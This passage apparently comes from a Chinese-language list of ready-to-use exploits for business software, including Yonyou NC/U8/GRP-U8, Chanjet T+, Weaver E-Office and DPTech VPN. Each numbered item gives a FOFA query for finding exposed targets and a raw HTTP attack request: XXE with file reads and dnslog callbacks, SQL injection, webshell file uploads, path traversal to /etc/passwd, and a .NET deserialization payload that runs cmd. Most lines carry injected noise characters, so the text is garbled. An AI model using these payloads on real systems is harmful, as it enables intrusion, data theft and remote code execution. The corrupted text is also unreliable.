: t/ J6 o( E' P/ R! P aPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.19 T" l4 J7 x+ n( Q- _0 n/ p
Host: 203.25.218.166:8888
/ D* r% A+ D0 g! T* cUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info: A( @0 \" y. v- [, V! C c1 i+ ]
Accept-Encoding: gzip, deflate
9 F9 S- I0 i! Z5 E8 `4 BAccept: */*
4 ]2 o. |* ~0 h3 [0 W. G- S% }Connection: close
R$ f) l; z1 A6 p: ~accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA P+ v/ C! S4 C: _5 m" w) o
Content-Length: 1908 ?# j) i5 y) ?. n ]7 b% ^% D1 V
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
/ J& x: f4 i+ m4 z1 W) E* P" ~+ p& j* w, K* `; i" y* S
--fd28cb44e829ed1c197ec3bc71748df03 Z9 `/ S; a$ F- H$ y7 H8 g7 z
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"2 {0 i, ?; k8 x; s* G3 U# x( B- I
/ l+ d' {* g/ Y. A$ E
<%out.println(1111*1111);%>
$ b; n( u3 w M+ k& `/ [5 r: A- @--fd28cb44e829ed1c197ec3bc71748df0--7 q' _1 b* V) H$ B6 O" i
7 l& D2 m7 ]+ |( R9 n1 z
( B! L( g9 e% s* W0 K36. 用友NC-Cloud soapFormat XXE' \8 A2 C. a5 s/ H+ W7 N! H: p
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
. c9 j. R8 h/ KPOST /uapws/soapFormat.ajax HTTP/1.1! M- k' P! m( j' t
Host: 192.168.40.130:8989" L1 i( A2 V8 U- `" H# H# l, k! g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
5 e% T( @3 K2 i4 D, ]3 r# E5 g/ NContent-Length: 263
( S. l; T, Z, c$ tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: e! d. A2 P) v. f1 y
Accept-Encoding: gzip, deflate
0 ^( Q$ h( H+ L7 c9 t$ d ~! F1 n- zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) n4 l& W2 Z4 j/ {) WConnection: close
" O. p. x, }- K" v, eContent-Type: application/x-www-form-urlencoded3 d* V" J8 |# G) y
Upgrade-Insecure-Requests: 1
% Y$ H2 W. V! v6 R1 S% {+ V. \! O" J/ I7 O3 Z$ i
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
/ O$ N& S& L5 r0 ?1 N3 d C$ q3 ?% ?" ]* D* n# Y' P F
9 u k" E4 c3 W# E G
37. 用友NC-Cloud IUpdateService XXE
& {4 C$ f* D; b( o/ C9 HFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
+ ^# i/ w4 K9 i7 b9 z5 Z/ a0 yPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
+ o# ~* b o. L0 rHost: 192.168.40.130:8989( c* l, c+ U" w7 j2 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
$ J4 z8 u+ I0 pContent-Length: 421
/ o8 B; V8 A6 B; [6 x d' ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99 S! H' v f2 E/ b, q
Accept-Encoding: gzip, deflate: c7 C( m+ ]5 q4 `8 }
Accept-Language: zh-CN,zh;q=0.9
" f; g$ g; D4 vConnection: close
, }' b. C5 N. p7 D! z$ pContent-Type: text/xml;charset=UTF-8
. a" K8 T# v$ uSOAPAction: urn:getResult# o. k5 P% c7 {
Upgrade-Insecure-Requests: 12 Z/ K" W0 T" N, k7 u9 |! ]/ q3 c, x) A9 ~
! {% w8 W( X) `0 d<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">8 B/ g" b# E* }
<soapenv:Header/>
+ R, t% y8 b9 x) e/ T<soapenv:Body>
& ^$ z7 C% q9 {; w; x6 E: _% I<iup:getResult>
* L7 ]7 V+ v+ U; f5 s& }" X d<!--type: string-->
/ j, X0 M5 H5 ]/ S+ |( _1 T<iup:string><![CDATA[
6 @/ b/ G) _, h- v) o2 w) R5 g<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
; c9 D* Z8 V& p; G<xxx/>]]></iup:string>+ O# L8 f! N6 u
</iup:getResult>
: y6 [& [( R2 G% }. _</soapenv:Body>
; Q- N# \/ B, }4 l# L$ ^</soapenv:Envelope>4 Q8 v, Z/ R% h
3 Z; q/ L* O% c" D
M" w/ a: C% F! [% f: M% O
5 E B( E- f- ?5 i( V# G
38. 用友U8 Cloud smartweb2.RPC.d XXE
9 g' _ M" [1 U- l- g0 [FOFA:app="用友-U8-Cloud"
$ ~$ `- A# o& e. V) PPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
5 l3 q( I1 t7 h: V/ c, T3 i! h: YHost: 192.168.40.131:8088
: b% c+ ^/ B3 `8 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25# C) T# v, R9 [- ^5 _( k
Content-Length: 260( ~ V$ `% x# i y: I$ C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 m/ x# M* ?+ Q. s- o6 e7 z [8 DAccept-Encoding: gzip, deflate, D4 H, x. S9 \5 G t* O
Accept-Language: zh-CN,zh;q=0.9
# E* _3 ` n* D7 L- f( F3 U6 xConnection: close
" w; g! q# E r8 pContent-Type: application/x-www-form-urlencoded2 C4 I: Z' |; b) c8 |
p1 _8 V4 G, O# a( ]/ w/ m
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>0 R3 u2 z+ I9 ~' o* k
' \% n! {, {7 S
1 a L: @* A1 M: _$ [5 V9 Q
39. 用友U8 Cloud RegisterServlet SQL注入* C. n9 P9 p( U! j( r/ b9 x+ ?& g
FOFA:title="u8c"
+ F! o% N' H2 Z5 ?, ?- I, P: w" yPOST /servlet/RegisterServlet HTTP/1.18 n7 v9 r! `0 t1 ~4 c
Host: 192.168.86.128:8089
2 O P" Q, _3 p6 Q7 b7 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
# O+ d5 G- y1 y8 vConnection: close* X1 c% I6 m) _7 @, \- b% A
Content-Length: 85/ D* E, y0 Y' l; O* f) H$ R- G
Accept: */*
3 |/ I5 y& K7 R8 X; @Accept-Language: en
& I R2 s3 j4 A; T, l. WContent-Type: application/x-www-form-urlencoded
9 Q! l) H0 @+ C4 ZX-Forwarded-For: 127.0.0.1
& A# F: V4 r- {, ~$ q2 [Accept-Encoding: gzip
! i$ G; \( ], o+ B5 {( c
# H/ M0 X7 |' g# xusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--- c. k% [6 ]; p' [) ]6 ^3 k5 h
; f! ^% ?, Y; ?0 }; A& e0 v
8 c0 V5 H* a {+ L# n7 i* X9 W40. 用友U8-Cloud XChangeServlet XXE- K o9 R; K+ d5 y
FOFA:app="用友-U8-Cloud"
/ e9 h: G Q2 j Z7 {POST /service/XChangeServlet HTTP/1.1- I$ C% u0 E. B4 `/ }
Host: x.x.x.x
" `" f, e, ^2 m' v! ]$ q) VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! P* n8 _& L2 O" `# d
Content-Type: text/xml
' U6 y, l$ Z5 f. iConnection: close
+ e9 D2 p/ s9 G& F' S0 V
6 \6 X1 l* o5 }' O* c) \<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>" I" }! c" R4 n: G! e
6 T4 z5 }4 s# N) q9 j+ j5 b
- l* I$ l4 M: f' }* Q# \' o
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入. B( S; p4 V+ P# w% E
FOFA:app="用友-U8-Cloud"! O) i% L$ x* Y( [, a* P
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
, L' _/ I& e8 NHost:: x* w3 ~, B% x" D) i' l" D! G' T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 G" B" z; j3 VContent-Type: application/json
E# w/ M* U; OAccept-Encoding: gzip# [' ^7 _: `7 r5 \( e
Connection: close* B1 L$ e+ d) ~- u' H
" r8 t; }( t8 }9 v9 u( g
* S- n8 b, |3 n+ C: _9 _5 F1 t0 {& k
42. 用友GRP-U8 SmartUpload01 文件上传8 K9 m( l$ R5 c @' r7 Z
FOFA:app="用友-GRP-U8"8 M4 b; l& k% ?6 V: E) z' p \6 o* ^0 |( D
POST /u8qx/SmartUpload01.jsp HTTP/1.1$ _0 G0 G5 c4 k7 z d T8 w# [
Host: x.x.x.x' ^5 Q/ a! n; ] j
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt; s+ U7 ^8 B. S+ n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.369 \6 u8 a2 j0 X/ S8 q* z
, H* S! z" c3 H1 v9 T7 K! T$ l
PAYLOAD
3 ~1 m2 G" I% C. z9 Z8 B5 Y* Y% C% R Z
# M9 T$ b3 F6 c7 p
. q; y. J/ U! o0 M" I; A4 H- X1 vhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
: Q4 n: t0 M% p5 A, o0 }" O, \9 u0 l/ X, t: D% ^0 R: Q; _. H: w
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
( x) O+ M: U/ ~: }; S" RFOFA:app="用友-GRP-U8"
2 D# F! S8 z iPOST /services/userInfoWeb HTTP/1.1
4 ]* t& N3 G, J' i5 w" xHost: your-ip( {( L0 N7 V* t4 P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) V$ F" T+ @5 }" T! h, D4 b$ i; PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* z* N) o) R2 R; f" J" aAccept-Encoding: gzip, deflate
/ i0 \8 h) X0 L( q5 Q( Z4 y* h* OAccept-Language: zh-CN,zh;q=0.9
" |/ X1 \% E5 L& e8 VConnection: close
1 F, P" r- s( z# T4 sSOAPAction:
* F2 b8 f1 o6 @) K4 LContent-Type: text/xml;charset=UTF-8* z9 O3 _' ~! V, d& ^# C
' q! T2 C3 ]/ v" i- I2 N) t6 O' Q<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
/ n j, O) L. ?7 _0 A8 N3 r <soapenv:Header/>1 ^2 s, k* l# F! y2 w7 u5 r( \; n0 y
<soapenv:Body>
9 V4 Q* r1 O: F, R* i <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
9 `- ]; s+ c7 ^0 U3 ~. s <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
9 w' P7 J+ J$ z! \ </ser:getUserNameById>
! }+ O+ u4 c! I* F </soapenv:Body>/ H& w* K( Q O# j7 X7 z
</soapenv:Envelope>
3 f# _& [$ M3 D% Z9 \6 k* F x) N8 a7 e2 }
6 D! s. N: S% i& ?6 u( ]44. 用友GRP-U8 bx_dj_check.jsp SQL注入: j" k2 ?- K# {3 T" M' j
FOFA:app="用友-GRP-U8"
: |) E* @) ]4 {) GGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
7 g3 A/ l% z7 j3 e! V/ S6 ~Host: your-ip* d1 n( U8 c1 Q8 a/ s5 X! B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36# }- E8 n( p( \+ w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* ]% M; v% F) C0 ?) uAccept-Encoding: gzip, deflate/ }* C7 Q# c# o3 r0 B8 M' x3 s
Accept-Language: zh-CN,zh;q=0.9
9 B3 \4 a! `, g2 l4 t* eConnection: close
+ M2 h+ \( A3 ^' C+ i
9 r, z- \* @/ p( U0 u* w. E- l' R3 P+ b- f/ r) p7 y8 U# a0 X
45. 用友GRP-U8 ufgovbank XXE
) \# k9 t6 K& TFOFA:app="用友-GRP-U8"
9 Q* I8 `5 t% W% \0 e& n& JPOST /ufgovbank HTTP/1.1
( {5 S( k4 Z( [1 Q2 sHost: 192.168.40.130:222( a+ u B! A( b' t3 [' a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
, W- J0 f6 j% M( ~Connection: close
$ c2 M4 e" T9 C2 wContent-Length: 161
' P/ `% o- O. k7 }) d" g3 i9 E. TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ ~9 ^& l- ]% ? |7 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& W4 x9 y/ a) D
Content-Type: application/x-www-form-urlencoded6 B: W* F/ t. I, S U* y9 X% ~
Accept-Encoding: gzip
1 g8 x& ] Y1 V! t3 e
( }" t( J2 V$ F# U6 b- E9 U, LreqData=<?xml version="1.0"?>/ z7 Q% d7 l% }) V- J
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest% H- [6 q) C% @" {
0 X9 S/ Q" y s/ e9 \
( }! ~" U [$ m+ \! U46. 用友GRP-U8 sqcxIndex.jsp SQL注入5 i5 @% Y# w. J0 M: |3 o
FOFA:app="用友-GRP-U8"7 J2 o1 n$ |' Z
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1. g6 w7 P; w0 v& R N
Host: your-ip
, v/ V* e$ O+ l" v# _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
; d* u5 ?7 L. h/ M7 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& b$ q& A" ~# O9 D* @4 z" iAccept-Encoding: gzip, deflate
& b, A- j; t% d, @8 uAccept-Language: zh-CN,zh;q=0.98 j+ J: o5 e2 g" a s9 Y7 \" R
Connection: close
! O1 ^3 K: `& ?* \/ Y+ k9 n( J. N* @$ S3 @4 T! G% m$ ~! }
" N3 t$ t6 \( a! i7 b/ Y47. 用友GRP A++Cloud 政府财务云 任意文件读取5 y/ f- _" @1 C# q' [: g+ Y" w- _
FOFA:body="/pf/portal/login/css/fonts/style.css"
1 @6 R& V, P9 W8 a4 u2 Y% }- [GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
7 Y2 g, L; v% {$ l9 u2 DHost: x.x.x.x2 u2 T$ `% q, _3 Y1 y: B
Cache-Control: max-age=0
( j' h8 T; l, ~; j$ c7 qUpgrade-Insecure-Requests: 1( \2 V& F* r- r0 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# u4 K& Y+ W, H& J4 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 W; n6 F5 h# nAccept-Encoding: gzip, deflate, br
2 n, J- I+ |9 c* EAccept-Language: zh-CN,zh;q=0.9
" F T) P) z" sIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT/ \! J) Z: u2 p9 L! P- I; U& A
Connection: close
0 O! p' Z$ t2 O* K5 T0 H4 L
1 ?; L$ \4 J- D- ?, j; b1 R: z/ I9 J+ i
6 K% i( n; J) U: n
48. 用友U8 CRM swfupload 任意文件上传/ i/ x! {* ^/ Y
FOFA:title="用友U8CRM"
$ T/ z) s2 T; S3 H% f3 C1 nPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
6 H. g2 a) ^" f4 N, f. n9 p* xHost: your-ip
/ f1 E! N( z1 m( vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" E* P$ M% S# J' e6 n$ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# F+ n C) G i, S3 P8 U) y, a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 S* T+ x! N5 u3 I. p* t$ e4 J6 |Accept-Encoding: gzip, deflate* t, B F; R$ Q: Q& a- P
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855$ e5 Z) m0 z! T3 _
------269520967239406871642430066855
: B6 i( l+ n- o: t5 o' kContent-Disposition: form-data; name="file"; filename="s.php"
5 i6 Z8 s" @' H9 o5 F) W1231 e, u" o, A. Z9 S* ^. Q4 G" p
Content-Type: application/octet-stream* P* {/ [. w F
------269520967239406871642430066855% v2 G' ?( [8 P" Y
Content-Disposition: form-data; name="upload"4 G% t4 I& p9 g0 a9 |
upload
5 r1 {& p0 `* |- h: d3 E) h------269520967239406871642430066855--
6 [; N! ~6 R. i0 H3 y5 A( `. B* L' i1 @" I
1 J% e9 C) Z' f4 |; M3 @! i; {
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
" o2 B+ V& I( UFOFA:body="用友U8CRM"( {: k" z8 A% q. i
. z5 L4 b, ]$ U; sPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
' g9 @. E( r1 L1 M7 B8 V8 l2 gHost: x.x.x.x9 y9 P& X" A3 ~) p7 [$ P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- J$ f. }* m( z8 w, gContent-Length: 329% o- V4 @) R; |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 {2 X' z; U- k# ?7 w" oAccept-Encoding: gzip, deflate
1 _, }0 K% c( D$ J: f) @8 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& M6 \! I; B7 o8 d& }Connection: close
. q0 _% ^9 u& y0 V8 TContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
/ y3 Z+ _1 W$ _. }' M2 C" T" {& v: @) N9 u s
-----------------------------vvv3wdayqv3yppdxvn3w
% `5 D! p7 @& O2 `# v% i% BContent-Disposition: form-data; name="file"; filename="%s.php "
) v9 F" @7 ], X* N5 m* z& d" ZContent-Type: application/octet-stream8 M( `6 p; @5 Z \ X& n
& e3 X+ \ }: n" J( p0 S! i
wersqqmlumloqa3 w+ y. @/ c8 X0 C* V) X: x: I0 M
-----------------------------vvv3wdayqv3yppdxvn3w
: _% x6 B D1 s$ C: ZContent-Disposition: form-data; name="upload"
" R% j* }3 z# p' S) |; v0 l( n A: j* ?8 p. O
upload
# m# X& G) A" n-----------------------------vvv3wdayqv3yppdxvn3w--
- E9 W, ?: h. @( [0 n6 {
_! v5 R6 |1 W7 }; ?+ L: P& P8 g5 s3 d1 ~, j3 Z
http://x.x.x.x/tmpfile/updB3CB.tmp.php {( C! s, V8 J' C
& t) d% I' Y3 u8 m. Y5 T( e8 @
50. QDocs Smart School 6.4.1 filterRecords SQL注入! N7 Q. a5 x) j- B
FOFA:body="close closebtnmodal"" a* v) j/ U9 v: Z# Z0 r2 a8 M
POST /course/filterRecords/ HTTP/1.1; ~7 k" v( b5 ~9 b+ X! P* C
Host: x.x.x.x3 q" w' D$ J. P {; m; C; ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 w Q* A. ?$ m5 m0 _, D
Connection: close2 c9 d2 m; b3 U
Content-Length: 2243 X! Y/ Z1 `8 o e
Accept: */*, I: T# M8 n; _$ d! x+ L
Accept-Language: en
0 k2 k, ^, Q2 J: {7 X- x3 U) s" m& CContent-Type: application/x-www-form-urlencoded
! ^) ~3 W: W1 \% j8 M. p" F, |& fAccept-Encoding: gzip* a( s% D: P! F5 F0 }4 B n
/ ^5 `( m* @5 T5 Y) Gsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
- ?" P7 q; p) |$ l& l8 e- n5 }; d" c! w
( Y" M- p g9 j$ m51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
3 Y; p( T, c& ]0 k1 p# x! AFOFA:app="云时空社会化商业ERP系统"
# j# ?4 v) H& u: t7 L3 m% DGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
4 C' _! A( A: k, O4 uHost: your-ip5 J. y! H4 c0 Y! \: l
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 }! Q+ }( X# J" h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" D$ m! A# {: w3 a+ U
Accept-Encoding: gzip, deflate
% R% M/ z/ W' h5 c( RAccept-Language: zh-CN,zh;q=0.9
& x1 \# g7 @, q, U1 pConnection: close
A) P6 I4 O7 n6 c) `: c( ]1 [3 G2 ]) L4 F a I$ B
' `$ B0 H, e9 ^3 _/ v52. 泛微E-Office json_common.php sql注入5 e. B, ^$ W6 y& R% A! f
FOFA:app="泛微-EOffice"
! A' l" l( z6 oPOST /building/json_common.php HTTP/1.1' b* g! q7 v# D- V
Host: 192.168.86.128:8097, r' ?/ q8 t: s( F1 \" P% }
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# V( ^! ?8 ]5 i1 [% e( W
Connection: close' I7 l$ ~+ o: W7 k5 @
Content-Length: 87, t2 F7 Z: L C+ m5 f
Accept: */*
% c% C ~; b( T- J2 ?! t3 P3 }Accept-Language: en
: M6 @. t: k0 NContent-Type: application/x-www-form-urlencoded
' E( i; Z* C) ?5 A- a4 oAccept-Encoding: gzip7 U7 o O% P. n' e$ X) \, {5 j0 C" c
- ?/ |$ R$ J8 x
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
/ q- H' A. @5 r* G& t8 H# s* k7 L7 F1 L% W4 u# a' k
3 ]+ A: {: t9 w5 L
53. 迪普 DPTech VPN Service 任意文件上传
* R3 O7 X5 Z! l; J; U$ b# x+ eFOFA:app="DPtech-SSLVPN"
5 E. K- m# s6 g# W# [/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
# s5 m. K# x4 W% B$ L8 ]& a& }; o6 c$ U
, O' q- D6 {* Z# T0 c
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
1 L% q; z) E7 ?/ D$ VFOFA:app="畅捷通-TPlus"
! d# g* _( {, J9 m. n2 ]# |第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
) I1 v. Q6 t1 }. c& g"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"$ b: Q' {) U( C, ~/ {
& l8 H5 ^4 p1 h) K4 T7 o' N; M6 E2 r3 k3 z) ]% a! F' R
完整数据包
3 O& s" [7 R7 d6 i# i7 V. ?1 Y' SPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
- o% ?# C) N9 m: U: Z* n/ a! rHost: x.x.x.x7 n& _ |3 L, ^! f& t
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F' l$ A: o6 c6 k1 [' }8 F/ b* Y) w
Content-Length: 593
O: s* y8 }0 |3 s/ W# H3 V2 \+ l
& C' @. Y2 P- u2 N{
( m2 h8 Y5 ~- K( h1 b \" `"storeID":{
+ U% x5 j+ `7 A+ f "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
3 I! R/ i; y" K8 F4 O$ A "MethodName":"Start",
2 p% m, w+ w. f+ s "ObjectInstance":{9 p, B. d3 p8 x# ^
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 V* z& G" i- S* j3 z
"StartInfo":{
6 A% x. @8 s. k! o A "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 J9 j5 i' r4 r, s4 D "FileName":"cmd",+ B8 p7 Y* z) f- I' g! x6 h
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% t% \ e' c" ]" e6 O
}+ b" W; V! q! V* S3 }
}5 C7 z" N5 R) y
} w$ n; q' P1 h' J8 j
}
2 N% \3 ~1 U( Y" p1 V8 H5 V( D$ C9 v1 b- l2 _+ R5 j
3 }) {! ~+ }( ?3 E8 q
第二步,访问如下url3 Z: q' R5 ]- s" \6 O
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt1 R# w ?* E/ X3 m
T) u( b `4 S$ s8 b
1 k- u+ W" s% g0 P; Q
55. 畅捷通T+ getdecallusers信息泄露8 _/ S! B5 |1 U4 f) l* G
FOFA:app="畅捷通-TPlus"0 ^ n7 Y9 Z. i8 @ Z Z! c$ {
第一步,通过
9 m4 V4 U& x8 \2 K% ~0 E" z/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
7 e8 e: B+ M) o& ?! J第二步,利用获取到的Cookie请求
1 w+ D( w/ U: U6 c/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers% X v8 Z) i7 A! r9 I3 e- h
. _" ]4 M3 S) O: g0 b/ m
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
& d8 H* p6 r, w1 ^- g4 D& jFOFA: app="畅捷通-TPlus"+ d8 I9 x3 v. a1 Q8 T6 p: z* x* {
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.16 e9 _: F! u% P+ u! N/ p: z
Host: x.x.x.x
